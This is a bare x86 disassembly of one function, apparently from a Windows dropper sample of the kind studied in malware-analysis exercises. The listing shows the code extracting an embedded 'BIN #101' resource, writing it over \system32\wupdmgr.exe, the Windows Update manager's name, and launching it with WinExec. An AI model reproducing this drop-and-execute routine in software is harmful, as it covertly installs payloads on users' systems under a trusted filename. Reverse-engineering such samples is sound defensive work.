000011FC PUSH EBP
000011FD MOV EBP, ESP
000011FF SUB ESP, 568
00001205 PUSH EDI
00001206 MOV DWORD PTR SS:[EBP-12], 0
0000120D MOV DWORD PTR SS:[EBP-292], 0
00001217 MOV DWORD PTR SS:[EBP-8], 0
0000121E MOV DWORD PTR SS:[EBP-568], 0
00001228 MOV DWORD PTR SS:[EBP-4], 0
0000122F MOV DWORD PTR SS:[EBP-288], 0
00001239 MOV BYTE PTR SS:[EBP-284], 0
00001240 MOV ECX, 43
00001245 XOR EAX, EAX
00001247 LEA EDI, DWORD PTR SS:[EBP-283]
0000124D REP STOS DWORD PTR ES:[EDI]
0000124F STOS BYTE PTR ES:[EDI]
00001250 MOV BYTE PTR SS:[EBP-564], 0
00001257 MOV ECX, 43
0000125C XOR EAX, EAX
0000125E LEA EDI, DWORD PTR SS:[EBP-563]
00001264 REP STOS DWORD PTR ES:[EDI]
00001266 STOS BYTE PTR ES:[EDI]
00001267 PUSH 10E
0000126C LEA EAX, DWORD PTR SS:[EBP-284]
00001272 PUSH EAX
00001273 CALL DWORD PTR DS:[402034] (KERNEL32.dll : GetWindowsDirectoryA)
00001279 PUSH 304C (\system32\wupdmgr.exe)
0000127E LEA ECX, DWORD PTR SS:[EBP-284]
00001284 PUSH ECX
00001285 PUSH 3064 (%s%s)
0000128A PUSH 10E
0000128F LEA EDX, DWORD PTR SS:[EBP-564]
00001295 PUSH EDX
00001296 CALL DWORD PTR DS:[402054] (MSVCRT.dll : _snprintf)
0000129C ADD ESP, 20
0000129F PUSH 0
000012A1 CALL DWORD PTR DS:[402030] (KERNEL32.dll : GetModuleHandleA)
000012A7 MOV DWORD PTR SS:[EBP-12], EAX
000012AA PUSH 306C (BIN)
000012AF PUSH 3070 (#101)
000012B4 MOV EAX, DWORD PTR SS:[EBP-12]
000012B7 PUSH EAX
000012B8 CALL DWORD PTR DS:[40202C] (KERNEL32.dll : FindResourceA)
000012BE MOV DWORD PTR SS:[EBP-292], EAX
000012C4 MOV ECX, DWORD PTR SS:[EBP-292]
000012CA PUSH ECX
000012CB MOV EDX, DWORD PTR SS:[EBP-12]
000012CE PUSH EDX
000012CF CALL DWORD PTR DS:[40204C] (KERNEL32.dll : LoadResource)
000012D5 MOV DWORD PTR SS:[EBP-8], EAX
000012D8 MOV EAX, DWORD PTR SS:[EBP-292]
000012DE PUSH EAX
000012DF MOV ECX, DWORD PTR SS:[EBP-12]
000012E2 PUSH ECX
000012E3 CALL DWORD PTR DS:[402024] (KERNEL32.dll : SizeofResource)
000012E9 MOV DWORD PTR SS:[EBP-288], EAX
000012EF PUSH 0
000012F1 PUSH 0
000012F3 PUSH 2
000012F5 PUSH 0
000012F7 PUSH 1
000012F9 PUSH 40000000
000012FE LEA EDX, DWORD PTR SS:[EBP-564]
00001304 PUSH EDX
00001305 CALL DWORD PTR DS:[402020] (KERNEL32.dll : CreateFileA)
0000130B MOV DWORD PTR SS:[EBP-568], EAX
00001311 PUSH 0
00001313 LEA EAX, DWORD PTR SS:[EBP-4]
00001316 PUSH EAX
00001317 MOV ECX, DWORD PTR SS:[EBP-288]
0000131D PUSH ECX
0000131E MOV EDX, DWORD PTR SS:[EBP-8]
00001321 PUSH EDX
00001322 MOV EAX, DWORD PTR SS:[EBP-568]
00001328 PUSH EAX
00001329 CALL DWORD PTR DS:[40201C] (KERNEL32.dll : WriteFile)
0000132F MOV ECX, DWORD PTR SS:[EBP-568]
00001335 PUSH ECX
00001336 CALL DWORD PTR DS:[402048] (KERNEL32.dll : CloseHandle)
0000133C PUSH 0
0000133E LEA EDX, DWORD PTR SS:[EBP-564]
00001344 PUSH EDX
00001345 CALL DWORD PTR DS:[402018] (KERNEL32.dll : WinExec)
0000134B POP EDI
0000134C MOV ESP, EBP
0000134E POP EBP
0000134F RETN 
